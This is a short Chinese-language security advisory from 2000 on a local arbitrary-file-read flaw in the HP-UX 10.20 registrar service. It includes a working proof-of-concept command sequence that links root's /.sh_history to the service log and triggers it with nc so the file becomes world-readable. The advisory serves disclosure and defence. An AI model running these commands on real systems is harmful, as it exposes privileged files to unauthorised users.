HP-UX registrar本地任意文件可读发布时间:2000-11-09 更新时间:2000-11-09 严重程度:中 威胁程度:本地拒绝服务 错误类型:竞争条件 利用方式:服务器模式 受影响系统 HP HP-UX 10.20详细描述 registrar 服务是HP-UX10.20自带的程序,其中存在漏洞可以导致本地用户读系统 主机上的任意文件,这个服务写一个LOG文件到/etc/opt/resmon/log/registrar.log。而 /etc/opt/resmon/log 目录的默认权限是允许用户通过"mv"命令来覆盖LOG文件。在Mv一个存在的LOG文件到任意位置的时候,恶意用户可以建立一个符号连接到任意文件。 测试代码 $ uname -sr HP-UX B.10.20 $ cd /etc/opt/resmon/log $ mv registrar.log registrar.log.orig $ ls -l /.sh_history -rw------- 1 root sys 3316 Sep 20 15:22 /.sh_history $ ln /.sh_history registrar.log $ nc hpux.example.com 1712 < /etc/motd $ ls -l /.sh_history -rw-r--r-- 2 root sys 3605 Nov 8 09:45 /.sh_history $ rm -f registrar.log $ mv registrar.log.orig registrar.log 解决方案 尚无 相关信息 |
